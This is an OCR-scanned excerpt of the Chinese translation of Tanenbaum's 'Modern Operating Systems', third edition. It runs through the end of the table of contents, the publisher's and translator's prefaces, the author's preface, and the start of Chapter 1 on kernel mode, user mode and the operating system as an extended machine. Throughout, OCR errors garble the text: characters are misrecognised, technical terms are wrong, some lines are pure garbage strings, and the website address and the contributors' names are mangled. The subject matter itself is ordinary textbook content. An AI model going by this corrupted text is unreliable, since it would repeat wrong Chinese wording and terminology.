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10.6.4 NFS: 网 络 文件 系统 
10.7 Linux 的 安全 性 
10.7.2 Linux 中 安全 相关 的 系统 调用 
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12.1 Symbian 操作 系统 的 历史 
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12.1.4 今天 的 Symbian 操作 系统 
12.2 Symbian 操作 系统 概 六 
12.2.1 面向 对 象 


12.2.2 ” 微 内 核 设计 


12.2.3 Symbian 操作 系统 纳 核 
1224 ary a A] 


12.41 没有 虚拟 内 存 的 系统 
12.4.2 ”Symbian 操作 系统 的 寻 址 方式 
12.5 ”输入 和 输出 

12.5.1 设备 驱动 

12.5.2 ”内 核 扩展 

12.5.4 ”特殊 情况 ， 存储 介质 

12.5.5 阻塞 IO 

12.5.6 ”可 移动 存储 器 
12.6 存储 系统 


12.6.2 ”Symbian 操作 系统 文件 系统 
12.7 ” ”Symbian 操作 系统 的 安全 
12.8 Symbian 操作 系统 中 的 通信 
12.8.1 基本 基础 结构 
12.8.2 更 仔细 地 观察 基础 
12.9 小 结 


操作 系统 设计 

设计 问题 的 本 质 

13.1.1 目标 
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13.4.6 ”利用 局 部 性 
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13.5 ”项目 管理 
13.5.1 人 月 神话 
13.5.2 团队 结构 
13.5.3 经验 的 作用 
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13.6.2 ”多核 芯片 
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13.6.3 ”大 型 地 址 空间 操作 系统 
13.6.4 ”联网 

13.6.5 ”并 行 系统 与 分 布 式 系统 
13.6.6 ”多 媒体 
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第 14 章 ”阅读 材料 及 参考 文献 
14.1 进行 深入 阅读 的 建议 
14.1.1 简介 及 概要 
14.1.2 ”进程 和 线程 
14.1.3 ”存储 管理 
14.1.4 输入 /输出 
14.1.5 


14.1.6 


14.1.7 
1418 ”多 处 理 机 系统 
1419 ”安全 
14.1.10 Linux 


14.1.11 Windows Vista 
14.1.12 ”Symbian 操作 系统 
14.1.13 ”设计 原则 

14.2” 按 字母 顺序 排序 的 参考 文献 


出 版 着 的 话 


文 忆 复兴 以 降 ， 源 远 流 长 的 科学 精神 和 逐步 形成 的 学 术 规 范 ， 使 
西方 国家 在 目 然 科学 的 各 个 领域 取得 了 垄断 性 的 优势 ， 也 正 是 这 样 的 
传统 ， 使 美国 在 信息 技术 发 展 的 六 十 多 年 间 名 家 面 出 、 独 领 风 骚 。 在 
商业 化 的 进程 中 ， 美 国 的 产业 界 与 教育 界 越 来 越 紧密 地 结合 ， 计 算 机 
学 科 中 的 许多 泰山 北斗 同时 号 处 科研 和 教学 的 最 前 线 ， 由 此 而 产生 的 
经 典 科学 著作 ， 不 仅 璧 划 了 研究 的 范畴 ， 还 揭示 了 学 术 的 源 变 ， 既 遵 
循 学 术 规 范 ， 又 目 有 学 者 个 性 ， 其 价值 并 不 会 因 年 月 的 流逝 而 诚 退 。 


近年 ， 在 全 球 信息 化 大 潮 的 推动 下 ， 我 国 的 计算 机 产业 发 展 迅 
猛 ， 对 专业 人 才 的 需求 日 益 迫 切 。 这 对 计算 机 教育 界 和 出 版 界 都 既是 
机 遇 ， 也 是 挑战 ， 而 专业 教材 的 建设 在 教育 战略 上 显得 举足轻重 。 在 
我 国信 息 技术 发 展 时 间 较 短 的 现状 下 ， 美 国 等 发 达 国 家 在 其 计算 机 科 
学 发 展 的 几 十 年 间 积淀 和 发 展 的 经 典 教材 仍 有 许多 值得 借鉴 之 处 。 因 
此 ， 引 进 一 批 国外 优秀 计算 机 教材 将 对 我 国 计 算 机 教育 事业 的 发 展 起 
到 积极 的 推动 作用 ， 也 是 与 世界 接轨 、 建 设 真正 的 世界 一 流 大 学 的 必 
由 之 路 。 


机 械 工 业 出 版 社 华章 分 社 较 早 意识 到 “出 版 要 为 教育 服务 ”。 目 
1998 年 开始 ， 华 章 分 社 束 将 工作 重点 放 在 了 迟 选 、 移 译 国外 优秀 教材 
上 。 经 过 多 年 的 不 懈 努 力 ， 我 们 与 Pearson, McGraw-Hill, Elsevier, 


MIT, John Wiley&Sons, Cengage th As 4 HAA Bl EA S RAY 
合作 关系 ， 从 他 们 现 有 的 数 百 种 教材 中 疆 选 出 Andrew S.Tanenbaum, 
Bjarne Stroustrup, Brain W.Kernighan, Dennis Ritchie, Jim Gray, 
Afred V.Aho, John E.Hopcroft, Jeffrey D.Ullman, Abraham 
Silberschatz, William Stallings, Donald E.Knuth, John L.Hennessy, 
Larry 工 .Peterson 等 大 师 名 家 的 一 批 经 典 作品 ， 以 * 计 算 机 科学 丛书 "为 
总 称 出 版 ， 供 读者 学 习 、 人 研 究 及 珍藏 >。 大理石 纹 理 的 封面 ， 也 正体 现 
了 这 套 从 书 的 品位 和 格调 。 


“计算 机 科学 丛书” 的 出 版 工作 得 到 了 国内 外 学 者 的 万 力 襄 助 ， 国 
内 的 专家 不 仅 提供 了 中 肯 的 选 题 指 导 ， 还 不 秤 荔 若 地 担任 了 翻译 和 审 
校 的 工作 ; 而 原 书 的 作者 也 相当 关注 其 作品 在 中 国 的 传播 ， 有 的 还 专 
程 为 其 书 的 中 译本 作 序 。 迄 今 , “计算 机 科学 丛书” 已 经 出 版 了 近 两 百 
个 品种 ， 这 些 书籍 在 读者 中 树立 了 民 好 的 口碑 ， 并 被 许多 高 校 采 用 为 
正式 教材 和 参考 书籍 。 其 影印 版 “经 典 原版 书库 ”作为 姊妹 骗 也 被 越 来 
越 多 实施 双语 教学 的 学 校 所 采用 。 


权威 的 作者 、 经 典 的 教材 、 一 流 的 译 者 、 严 格 的 审 校 、 精 细 的 编 
辑 ， 这 些 因 素 使 我 们 的 图 书 有 了 质量 的 保证 。 随 着 计算 机 科学 与 技术 
专业 学 科 建 设 的 不 断 完 天 和 教材 改 持 的 逐渐 深化 ， 教 育 界 对 国外 计算 
机 教材 的 需求 和 应 用 都 将 步 入 一 个 新 的 阶段 ， 我 们 的 目标 是 尽 善 尽 
美 ， 而 反馈 的 意见 正 是 我 们 达到 这 一 终极 目标 的 重要 帮助 。 华 章 分 社 


欢迎 老师 和 读者 对 我 们 的 工作 提出 建议 或 给 予 指正 ， 我 们 的 联系 方法 
如 下 : 


华章 网 站 : www.hzbook.com 
电子 邮件 : hzjsj@hzbook.com 


联系 电话 : (010) 88379604 


联系 地 址 ， 北京 市 西城 区 百 万 庄 南 街 1 号 


邮政 编码 : 100037 
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华章 教育 


译 者 序 


Andrew S.Tanenbaum 教 授 写 作 的 《现代 操作 系统 》， 无 论 定 英文 
版 还 是 中 文 版 都 受到 了 中 国 读者 的 欢迎 。 究 其 原因 ， 该 书 内 容 丰 富 ， 
反映 了 当代 操作 系统 的 发 展 与 动 同 。 这 次 出 版 的 第 3 版 ， 无 疑 在 保持 原 
有 特色 的 基础 上 ， 又 有 所 发 展 。 


第 3 版 的 一 个 很 大 变化 是 ， 大 大 加 强 了 对 操作 系统 中 许多 抽象 概念 
的 叙述 ， 包 括 CPU 到 进程 的 抽象 、 物 理 内 存 到 地 址 空间 (虚拟 内 存 ) 
的 抽象 以 及 磁盘 到 文件 的 抽象 等 。Tanenbaum 教 授 在 《现代 操作 系 
统 》 前 两 版 中 ， 在 这 一 方面 确实 着 誉 不 多 。 译 者 在 翻译 该 书 前 两 版 的 
内 容 时 ， 束 对 此 有 些 疑 问 ， 似 乎 Tanenbaum 教 授 的 讲授 方法 与 众 不 
同 。 这 是 因为 ， 在 国内 许多 院 校 的 操作 系统 教学 过 程 中 ， 授 课 教师 非 
常 重视 对 这 些 抽象 概念 的 讲解 和 分 析 。 而 且 据 译 者 所 知 ， 在 美国 不 少 
大 学 的 操作 系统 教学 过 程 中 ， 也 很 重视 对 这 些 抽 象 概念 的 引入 。 译 者 
认为 ，Tanenbaum 教 授 在 第 3 版 中 对 有 关 操 作 系统 基本 抽象 概念 叙述 方 
式 的 重大 修改 ， 是 对 《现代 操作 系统 》 内 在 质量 的 提升 ， 将 使 第 3 版 受 
到 更 多 中 国教 师 和 读者 的 欢迎 。 


第 3 版 的 另外 一 个 重大 变化 是 ， 第 10 章 、 第 11 章 和 第 12 章 是 由 另外 
三 位 作者 贡献 的 ， 他 们 分 别 是 美国 佐治 亚 理工 学 院 的 Ada Gavrilovska 


博士 、Microsoft 公 司 的 Dave Probert 博 士 以 及 Hope 学 院 的 Mike Jipping 
教授 。 


第 10 章 的 贡献 者 Ada Gavrilovska 博 士 在 美国 佐治 亚 理工 学 院 的 计 
算 学 院 从 事 教 学 和 科研 工作 ， 她 具有 多 年 讲授 高 级 操作 系统 等 有 关 课 


程 的 经 验 ， 是 一 位 造 讶 很 高 的 研究 科学 家 。 


第 11 章 的 贡献 者 一 -Microsoft 公 司 的 Dave Probert 博 士 是 译 者 的 老 
朋友 了 。 我 们 在 编写 机 械 工业 出 版 社 出 版 的 《windows 操 作 系 统 原 
理 》 以 及 《Windows 内 核实 验 教 程 》 等 书籍 的 过 程 中 ， 有 过 密切 的 合 
{E ° Dave Probert 博 士 是 Microsoft 公 司 Windows 操 作 系统 内 核 的 主要 设 
计 人 员 之 一 ， 他 对 操作 系统 的 把 握 以 及 以 设计 师 身 份 对 Windows 操 作 
系统 内 核 深 入 和 广泛 的 认识 ， 几 乎 无 人 可 以 比拟 。Dave Probert 博 士 写 
作 了 第 11 章 ， 并 指出 哪些 地 方 Microsoft 做 对 了 ， 哪 些 地 方 Microsoft 做 
普 了 。 正 如 Tanenbaum 教 授 在 前 言 中 指出 的 : “由 于 Dave 的 工作 ， 本 书 
的 质量 有 了 很 大 提高 ”。 


Mike Jipping 教 授 是 Hope 学 院 计算 机 系 的 主任 ， 具 有 长 期 的 教学 与 
科研 经 验 。 他 早 在 2002 年 束 出 版 了 专著 《Symbian OS Communications 
Programming》， 对 用 于 智能 手机 的 Symbian 操 作 系 统 有 着 深刻 的 理 
解 ， 由 他 来 写作 有 关 Symbian OS 的 第 12 章 ， 当 然 是 再 合适 不 过 了 。 


本 书 还 增加 了 许多 新 的 习题 ， 有 助 于 读者 深入 理解 操作 系统 的 精 
Be 。 


本 书 的 出 版 得 到 了 机 械 工 业 出 版 社 华章 分 社 的 大 力 文 择 ， 在 此 表 
示 由 袁 感 谢 。 


参加 本 书 翻译 、 审 阅 和 校对 的 还 有 桂 尼 殉 、 古 亮 、 扎 俊 俊 、 孙 
忒 、 畅 明 、 上 日光 冬 、 刘 瞪 、 加 涛 、 张 旦 峰 、 陈 子 文 、 王 刚 、 张 琳 、 赵 
DUE ` IKIBE ` WRA ` D R a o FERE o EAR, 
BREES EE ae a ge S EAL e EEE (她 ) 们 
的 页 献 表示 诚 汐 的 感谢 。 


由 于 译 者 水 平 有 限 ， 本 书 的 译文 必定 会 存在 一 些 不 足 或 错误 之 
处 ， 欢 迎 各 位 专家 和 广大 读者 批评 指正 。 
译 者 
2009 年 5 月 
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第 3 版 与 第 2 版 有 很 大 的 不 同 。 首 和 完 ， 重 新 安排 了 章 订 ， 把 中 心材 
料 安排 下 了 本 书 的 开始 部 分 。 对 于 操作 系统 这 一 各 种 抽象 的 创建 者 ， 


给 予 了 更 多 的 关注 。 对 第 1 章 进 行 了 大 量 的 更 新 ， 引 入 了 所 有 的 概念 


第 2 章 涉 及 从 CPU 到 多 进程 的 抽象 。 第 3 章 是 关于 物理 内 存 到 地 址 空间 
(虚拟 内 存 ) 的 抽象 。 第 4 章 是 关于 位 盘 到 文件 的 抽象 。 进 程 、 虚 拟 地 
址 空间 以 及 文件 是 操作 系统 所 呈现 的 关键 概念 ， 所 以 与 以 前 版 本 相 比 
ie 


将 这 些 章节 安 排 在 更 为 靠 前 的 位 置 。 
第 1 章 在 很 多 地 方 都 进行 了 大 量 的 修改 和 更 新 。 例 如 ， 为 那些 只 旭 

的 读者 安排 了 对 C 程 序 设计 语言 和 C 运 行 时 模式 的 介绍 。 
以 反映 它们 的 重要 


=> 
A 


悉 Java 语 
在 第 2 章 里 ， 更 新 和 扩充 了 有 关 线 程 的 讨论 
性 。 另 外 ， 还 安排 了 一 节 关 于 IEEE 标 准 Pthread 的 讨论 。 
第 3 章 讨论 存储 管理 ， 已 经 重新 进行 了 组 织 ， 用 以 强调 操作 系统 的 
Ly 


即 为 每 个 进程 提供 虚拟 地 址 空间 的 抽象 。 有 关 批 处 


这 一 项 关键 功能 ， 
理 系 统 存储 管理 的 陈旧 材料 已 经 删 去 ， 对 有 关 分 页 实现 的 部 分 进行 了 
更 新 ， 以 便 能 够 满足 对 已 经 很 常见 的 大 地 址 空间 和 速度 方面 管理 的 需 


HE o 


对 第 4 章 到 第 7 章 进行 了 更 新 ， 删 去 了 陈旧 材料 ， 添 加 了 一 些 新 的 
材料 。 这 些 章 中 有 关 当 前 研究 的 小 市 是 全 部 重新 写作 的 。 此 外 ， 还 增 
加 了 许多 新 的 习题 和 程序 练习 。 


更 新 了 包括 多 核 系 统 的 第 8 章 ， 增 加 了 关于 虚拟 技术 、 虚 拟 机 管理 
程序 和 虚拟 机 一 个， 并 以 VMware 为 例 。 


对 第 9 章 进 行 了 很 大 的 修改 和 重新 组 织 ， 纳 入 关于 利用 代码 错误 、 
恶意 软件 和 对 抗 它们 的 大 量 新 材料 。 


第 10 章 介绍 Linux， 这 是 原先 第 10 章 (UNIX 和 Linux) 的 修改 版 。 
显然 ， 本 章 重点 是 Linux， 增 加 了 大 量 的 新 材料 。 


涉及 Windows Vista 的 第 11 章 对 原 有 的 内 容 (关于 Windows 2000) 
做 了 很 大 的 修改 ， 有 关 Windows 的 内 容 用 最 新 的 材料 进行 了 更 新 。 


第 12 革 是 全 新 的 。 作 者 认为 ， 尽 管 姐 入 式 操 作 系 统 远 比 用 于 PC 和 
笔记 本 电脑 中 的 操作 系统 要 多 ,但 是 ， 对 于 用 于 手机 和 PDA 中 的 和 散 入 
式 操作 系统 ， 在 很 多 教科 书 中 还 是 被 忽略 了 。 本 版 弥补 了 这 个 缺憾 ， 
对 普遍 用 于 智能 手机 的 Symbian OS 进行 了 广泛 的 讨论 。 


第 13 划 是 天 于 操作 系统 设计 的 ， 第 2 版 的 内 容 多 数 都 体 留 了 。 


本 书 为 教师 提供 了 大 量 的 教学 辅助 材料 ， 可 以 在 如 下 网 站 得 到 : 
www.prenhall.comytanenbaum。 网 站 中 包括 PPT、 学 习 操作 系统 的 软件 


TR ` FELH ` RUBY, ARP RTR ERRARE ° OR 
用 本 书 的 教师 有 必要 访问 该 网 站 。 


这 一 版 得 到 了 许多 人 的 帮助 。 首 先 最 重要 的 是 编辑 Tracy 
Dunkelberger。Tracy 对 本 书 不 仅 尽 责 而 且 超出 了 其 本 职 范围 ， 如 安排 
大 量 的 评阅 ， 协 助 处 理 所 有 的 补充 材料 ， 处 理 合约 ， 与 出 版 社 接洽 ， 
协调 大量 的 并 发 事务 ， 设 法 使 工作 按时 完成 等 。 她 还 使 我 遭 守 一 个 六 
格 的 时 间 表 ， 以 保证 本 书 按时 出 版 。 谢 谢 Tracy。 


佐治 亚 理工 学 院 的 Ada Gavrilovska 是 Linux 内 核 技 术 专 家 ， 他 更 新 
了 第 10 章 ， 从 UNIX( 重 点 在 FreeBSD) 转 向 了 Linux， 当 然 该 章 的 许多 内 
容 对 所 有 的 UNIX 系 统 也 适用 。 在 学 生 中 Linux 比 FreeBSD 更 普及 ， 所 
以 这 是 一 个 有 意义 的 转变 。 


Microsoft 公 司 的 Dave Probert 更 新 了 第 11 章 ， 从 Windows 2000F% [4] 
了 Windows Vista， 尽 管 两 者 存在 着 相似 之 处 ， 但 它们 之 间 还 是 有 很 大 
差别 的 。Dave 对 Windows 技 术 有 深刻 的 认识 ， 并 足以 指出 哪些 地 方 
Microsoft 做 对 了 ， 哪 些 地 方 Microsoft 做 错 了 。 由 于 Dave 的 工作 ， 本 书 
的 质量 有 了 很 大 提高 。 


Hope 学 院 的 Mike Jipping 写 作 了 有 关 Symbian OSIX—H © AFAR 
乏 天 于 磐 入 式 实 时 系统 的 内 容 ， 则 会 使 本 书 存 在 重大 缺憾 ， 感 谢 Mike 


使 本 书 免除 了 这 个 问题 。 在 现实 世界 中 ， 嵌 入 式 实时 系统 变 得 越 来 越 
重要 ， 本 章 对 这 方面 的 内 容 提供 了 出 色 的 论述 。 


与 Ada、Dave 和 Mike 都 各 自 专 注 一 章 不 同 ， 科 罗拉 多 大 学 Boulder 
分 校 的 Shivakant Mishra 更 像 是 一 个 分 布 式 系统 ， 他 阅读 和 评述 了 许多 
章 方 ， 并 为 本 书 提供 了 大 量 的 新 习题 和 编程 问题 。 


还 值得 提出 的 是 Hugh Lauer ° 在 我 们 询问 他 有 关 修 改 第 2 版 的 建议 
时 ， 不 曾 想 得 到 一 份 23 页 的 报告 。 本 书 的 许多 修改 ， 包 括 对 进程 、 地 
址 空间 和 文件 等 抽象 的 着 重 强调 ， 痢 是 源 于 他 的 意见 。 


对 那些 以 各 种 方式 《从 新 论题 建议 到 封面 ， 细 心 阅读 文稿 ， 提 供 
补充 材料 ， 贡 献 新 习题 等 ) 给 予 支 持 的 其 他 人 士 ， 作 者 也 不 胜 感激 。 
这 些 人 士 是 Steve Armstrong ` Jeffrey Chastine ` John Connelly ` Mischa 
Geldermans ` Paul Gray ` James Griffioen ` Jorrit Herder ` Michael 
Howard ` Suraj Kothari ` Roger Kraft ` Trudy Levine ` John 
Masiyowski ` Shivakant Mishra ` Rudy Pait ` Xiao Qin ` Mark 


Russinovich ` Krishna Sivalingam ` Leendert van Doorn 和 Ken Wong ° 


Prentice Hall 的 员工 总 是 友好 和 乐于 助人 的 ， 特 别 是 负责 生产 的 
Irwin Zucker 和 Scott Disanno， 以 及 负责 编辑 的 David Alick ` ReeAnne 


Davies 和 Melinda Haggerty。 


Barbara 和 Marvin 像 往常 一 样 ， 保 持 着 各 自 独 特 的 美妙 方式 。 当 
然 ， 还 要 感谢 付出 了 爱 和 耐心 的 Suzanne ° 


Andrew S.Tanenbaum 
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现代 计算 机 系统 由 一 个 或 多 个 处 理 器 、 主 存 、 人 磁盘 、 打 印 机 、 键 
盘 、 岂 标 、 显 示 右 、 网 络 接口 以 及 各 种 其 他 输入 /输出 设备 组 成 。 一 般 
而 言 ， 现 代 计 算 机 系统 是 一 个 复杂 的 系统 。 如 果 每 位 应 用 程序 员 都 不 
得 不 掌握 系统 所 有 的 细 玉 ， 那 束 不 可 能 再 编写 代码 了 。 而 且 ， 管 理 所 
有 这 些 部 件 并 加 以 优化 使 用 ， 是 一 件 挑战 性 极 强 的 工作 。 所 以 ， 计 算 
机 安装 了 一 层 软件 ， 称 为 操作 系统 ， 它 的 任务 是 为 用 户 程 序 提供 一 个 
更 好 、 更 简单 、 更 清晰 的 计算 机 模型 ， 并 管理 刚才 提 到 的 所 有 这 些 设 
备 。 本 书 的 主题 就 是 操作 系统 。 


多 数 读 者 都 会 对 诸如 Windows、Linux、FreeBSD 或 Mac OS X 等 某 
个 操作 系统 有 些 体验 ， 但 表面 现象 是 会 驴 人 人 的。 用 户 与 之 交互 的 程 
序 ， 基 于 文本 的 通常 称 为 shell， 而 基于 图 标的 则 称 为 图 形 用 户 界 面 
(Graphical User Interface, GUI) ， 它 们 实际 上 并 不 是 操作 系统 的 一 
部 分 ， 尽 管 这 些 程序 使 用 操作 系统 来 完成 工作 。 


图 1-1 给 出 了 在 这 里 所 讨论 主要 部 件 的 一 个 简化 视图 。 图 的 底部 是 
硬件 。 硬 件 包 括 忌 片 、 电 路 板 、 亿 c 盘 、 键 盘 、 显 示 右 以 及 类 似 的 设 
备 。 在 硬件 的 顶部 是 软件 。 多 数 计算 机 有 两 种 运行 模式 ， 内 核 态 和 用 
户 态 。 软 件 中 最 基础 的 部 分 是 操作 系统 ， 它 运行 在 内 核 仿 (也 称 为 管 
态 、 核 心态 ) 。 在 这 个 模式 中 ， 操 作 系统 具有 对 所 有 硬件 的 完全 访问 


权 ， 可 以 执行 机 器 能 够 运行 的 任何 指令 。 软 件 的 其 余部 分 运行 在 用 户 
仿 下 。 在 用 户 态 下 ， 只 使 用 了 机 此 指 令 中 的 一 个 子 集 。 特 别 地 ， 那 些 
会 影响 机 器 的 控制 或 可 进行 WO (输入 /输出 ) 操作 的 指令 ， 在 用 户 态 
中 的 程序 里 十 禁止 的 。 在 本 书 中 ， 我 们 会 不 断 地 讨论 内 核 态 和 用 户 态 
之 间 的 差别 。 


用 户 接口 程序 ，shell 或 者 GUI， 处 于 用 户 态 程序 中 的 最 低层 次 ， 
允许 用 户 运 行 其 他 程序 ， 诸 如 Web 浏 览 右 、 电 子 邮 件 阅 读 釉 或 音乐 播 
放 器 等 。 这 些 程序 也 大 量 使 用 操作 系统 。 


操作 系统 所 在 的 位 置 如 图 1-1 所 示 。 它 运行 在 旬 机 之 上 ， 为 所 有 其 
他 软件 提供 基础 的 运行 环境 


电子 邮件 “音乐 


Web 浏 览 器 阅读 器 。 播放 器 


| 用 户 接口 程序 软件 


ABE -| 操作 系统 


图 1-1 操作 系统 所 处 的 位 置 


操作 系统 和 普通 软件 (用 户 态 ) 之 间 的 主要 区 别 是 ， 如 果 用 户 不 
言 欢 某 个 特定 的 电子 邮件 阅读 器 ， 他 可 以 目 由 选择 男 一 个 ， 或 者 选择 
目 己 写 一 个 ， 但 是 他 不 能 目 行 写 一 个 属于 操作 系统 一 部 分 的 时 钟 中 断 
处 理 程序 。 这 个 程序 由 硬件 保护 ， 防 止 用 户 试图 对 其 进行 修改 。 


然而 ， 有 时 在 舱 入 式 系统 (该 系统 没有 内 核 态 或 解释 系统 (如 
基于 Java 的 操作 系统 ， 它 采用 解释 方式 而 非 硬件 方式 区 分 组 件 ) 中 ， 
上 述 区 别 是 模糊 的 。 


另外 ， 在 许多 系统 中 ， 一 些 在 用 户 态 下 运行 的 程序 协助 操作 系统 
完成 特权 功能 。 例 如 ， 经 角 有 一 个 程序 供用 户 修改 其 口令 之 用 。 但 是 
这 个 程序 不 是 操作 系统 的 一 部 分 ， 也 不 在 内 核 仿 下 运行 ， 不 过 和 它 明 显 
地 市 有 敏感 的 功能 ， 并 且 必 须 以 某 种 方式 给 予 保护 。 在 某 些 系统 中 
这 种 想法 被 推 癌 了 极致 ， 一 些 传统 上 被 认为 是 操作 系统 的 部 分 (诸如 
文件 系统 ) 在 用 户 空间 中 运行 。 在 这 类 系统 中 ， 很 难 划分 出 一 条 明显 
的 界限 。 在 内 核 态 中 运行 的 当然 是 操作 系统 的 一 部 分 ， 但 是 一 些 在 内 
核 外 运行 的 程序 也 有 争议 地 被 认为 是 操作 系统 的 一 部 分 ， 或 者 至 少 与 
操作 系统 密切 相关 。 


操作 系统 与 用 户 ( 即 应 用 ) 程序 的 差异 并 不 在 于 它们 所 处 的 地 
位 。 特 别 地 ， 操 作 系 统 是 大 型 、 复 洒 和 长 寿命 的 程序 。Linux 或 


Windows 操 作 系统 的 源 代码 有 5 百 万 行 数量 级 。 要 理解 这 个 数量 的 含 
义 ， 请 考虑 具有 5 百 万 行 的 一 套 书 ， 每 页 50 行 ， 每 卷 1000 页 HERE 
厚 ) 。 为 了 以 书 的 大 小 列 出 一 个 操作 系统 ， 需 要 有 100 卷 书 一 一 基 本 上 
需要 一 整个 书架 来 摆 放 。 请 设想 一 下 有 个 维护 操作 系统 的 工作 ， 

天 老板 带 你 到 装 有 代码 的 书架 旁 ， 说 : “去 读 吧 。”* 而 这 仅仅 是 运行 在 
内 核 中 的 部 分 代码 。 用 户 程序 ， 如 GUI、 库 以 及 基本 应 用 软件 (类 似 
于 Windows Explorer) 等 ， 很 容易 就 能 达到 这 个 代码 数量 的 10 倍 或 20 
倍 之 多 。 


至 于 为 什么 操作 系统 的 寿命 较 长， 读者 现在 应 该 清楚 了 一 一 操作 
系统 是 很 难 编写 的 。 一 旦 编写 完成 ， 操 作 系 统 的 所 有 者 当然 不 愿意 把 
它 扔 掉 ， 再 写 一 个 。 相 反 ， 操 作 系统 会 在 长 时 间 内 进行 演化 。 基 本 上 
可 以 把 Windows 95/98/Me 看 成 是 一 个 操作 系统 ， 而 Windows 
NT/2000/XP/Vista 则 是 另外 一 个 操作 系统 。 对 于 用 户 而 言 ， 它 们 看 上 去 
很 相像 ， 因 为 微软 公司 努力 使 Windows 2000/XP 与 被 替代 的 系统 ， 如 
Windows 98， 两 者 的 用 户 界面 看 起 来 十 分 相似 。 无 论 如 何 ， 微 软 公司 
52 Ff Windows 98 是 有 非常 正当 的 原因 的 ， 我 们 将 在 第 11 章 涉及 
Windows 细 节 时 具体 讨论 这 一 内 容 。 


贯穿 本 书 的 其 他 主要 例子 (除了 Windows) 还 有 UNIX， 以 及 它 的 
变 体 和 克隆 版 。UNIX， 当 然 也 演化 了 多 年 ， 如 System Vik ` Solaris LA 
及 FreeBSD 等 都 是 来 源 于 UNIX 的 原始 版 ; 不 过 尽管 Linux 非 常 像 依照 


UNIX 模 式 而 仿制 ， 并 且 与 UNIX 高 度 兼 容 ， 但 是 Linux 具 有 全 新 的 代码 
基础 。 本 书 将 采用 来 自 UNIX 中 的 示例 ， 并 在 第 10 章 中 具体 讨论 
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史 、 分 类 、 一 些 基 本 概念 及 其 结构 。 在 后 面 的 章节 中 ， 我 们 将 具体 地 


1.1 什么 是 操作 系统 


很 难 给 出 操作 系统 的 准确 定义 。 操 作 系 统 是 一 种 运行 在 内 核 态 的 
软件 一 一 尽管 这 个 说 法 并 不 总 是 符合 事实 。 部 分 原因 十 操作 系统 执行 
两 个 基本 上 独立 的 任务 ， 为 应 用 程序 员 (实际 上 是 应 用 程序 ) 提供 一 
个 资源 集 的 清晰 抽象 ， 并 管理 这 些 硬件 资源 ， 而 不 仅仅 是 一 堆 人 硬件 。 
另外 ， 还 取决 于 从 什么 角度 看 行 操作 系统 。 读 者 多 半 听 说 过 其 中 一 个 
或 男 一 个 的 功能 。 下 面 我 们 逐 项 进行 讨论 。 


1.1.1 作为 扩展 机 紫 的 操作 系统 


在 机 器 语言 一 级 上 ,多 数 计算 机 的 体系 结构 (指令 集 、 存 储 组 织 、 
IO 和 总 线 结构 ) 是 很 原始 的 ， 而 且 编 程 是 很 困难 的 ， 尤 其 是 对 输入 / 
输出 操作 而 言 。 要 更 细致 地 考察 这 一 点 ， 可 以 考虑 如 何 用 NEC PD765 


控制 硕 心 斤 来 进行 软盘 IO 操作 ， 多 数 基于 Intel 的 个 人 计算 机 中 使 用 了 
该 控制 器 兼容 必 片 。 《在 本 书 中 ， 术 语 “ 软 盘 ? 和 “人 磁 弄 ?是 可 互 换 

的 。) 我 们 之 所 以 使 用 软盘 作为 例子 ， 是 因为 它 虽然 已 经 很 少见 ， 但 
是 与 现代 硬盘 相 比 则 简单 得 多 。PD765 有 16 条 命令 ， 每 一 条 命令 向 一 
个 设备 寄存 紫 狼 入 长 度 从 1 字 节 到 9 字 市 的 特定 数据 。 这 些 命 令 用 于 读 
写 数据 、 移 动 磁头 臂 、 格 式 化 磁道 ， 以 及 初始 化 、 检 测 状 态 、 复 位 、 
校准 控制 器 及 设备 等 。 


最 基本 的 命令 是 read 和 write。 它 们 均 需 要 13 个 参数 ， 所 有 这 些 参 
数 封 狠 在 9 个 字 节 中 。 这 些 参 数 所 指定 的 信息 有 : 和 欲 读 取 的 磁盘 块 地 
址 、 和 位 道 的 面 区 数 、 物 理 介质 的 记录 格式 、 刷 区间 聊 以 及 对 已 删除 数 
据 地 址 标识 的 处 理 方法 等 。 如 末 读 者 不 慌 这 些 “ 故 弄 刻 虚 ” 的 语言 ， 请 
不 要 担心 ， 因 为 这 正 古 关键 所 在 一 一 它们 太 玄 秘 了 。 当 操作 结束 时 ， 
控制 器 心 片 在 7 个 字 市 中 返回 23 个 状态 及 出 错字 段 。 这 样 似乎 还 不 够 ， 
软盘 程序 员 还 要 注意 保持 步 进 电 机 的 开关 状态 。 如 果 电 机 关闭 着 ， 则 
在 读 写 数据 前 要 先 启动 它 《有 一 段 较 长 的 启动 延迟 时 间 ) 。 而 电机 又 
不 能 长 时 间 处 于 开局 状态 ， 否 则 软 强 片 束 会 被 请 坏 。 程 序 员 必 须 在 较 
长 的 启动 延迟 和 可 能 对 软盘 造成 损坏 (和 丢失 数据 ) 之 间 做 出 权衡 。 


现在 不 用 再 投 述 读 操作 的 具体 过 程 了 ， 很 清楚 ， 一 般 程 序 员 并 不 
想 涉 足 软盘 EN, ERA) 编程 的 这 些 具体 细节 。 相 反 ， 程 序 员 
需要 的 是 一 种 简单 的 、 高 度 抽 象 的 处 理 。 在 人 磁盘 的 情况 下 ， 典 型 的 抽 


想 


象 是 包含 了 一 组 已 命名 文件 的 一 个 磁盘 。 每 个 文件 可 以 打开 进行 读 写 
操作 ， 然 后 进行 读 写 ， 最 后 关闭 文件 。 诸 如 记录 是 否 应 该 使 用 修正 的 
调频 记录 方式 ， 以 及 当前 电机 的 状态 等 细节 ， 不 应 该 出 现在 提供 给 应 
用 程序 员 的 抽象 描述 中 。 


抽象 是 管理 复杂 性 的 一 个 关键 。 好 的 抽象 可 以 把 一 个 几乎 不 可 能 
管理 的 任务 划分 为 两 个 可 管理 的 部 分 。 其 第 一 部 分 是 有 关 抽 象 的 定义 
和 实现 ， 第 二 部 分 古 随时 用 这 些 抽象 解决 问题 。 几 乎 每 个 计算 机 用 户 
都 理解 的 一 个 抽象 是 文件 。 文 件 是 一 种 有 效 的 信息 片段 ， 诸 如 数码 照 
请 、 你 存 的 电子 邮件 信息 或 Web 页 面 等 。 处 理 数码 照片 、 电 子 邮 件 以 
及 Web 页 面 等 ， 要 比 处 理 磁 司 的 细 丰 容易， 这些 磁盘 的 具体 细 区 与 前 
面 竹 述 过 的 软 到 一 样 。 操 作 系 统 的 任务 是 创建 好 的 抽象 ， 并 实现 和 管 
理 它 所 创建 的 抽象 对 象 。 本 书 中 ， 我 们 将 研究 许多 关于 抽象 的 内 容 ， 
因为 这 是 理解 操作 系统 的 关键 。 


上 述 观 点 是非 常 重要 的 ， 所 以 值得 用 不 同 的 表述 语句 来 再 次 叙 
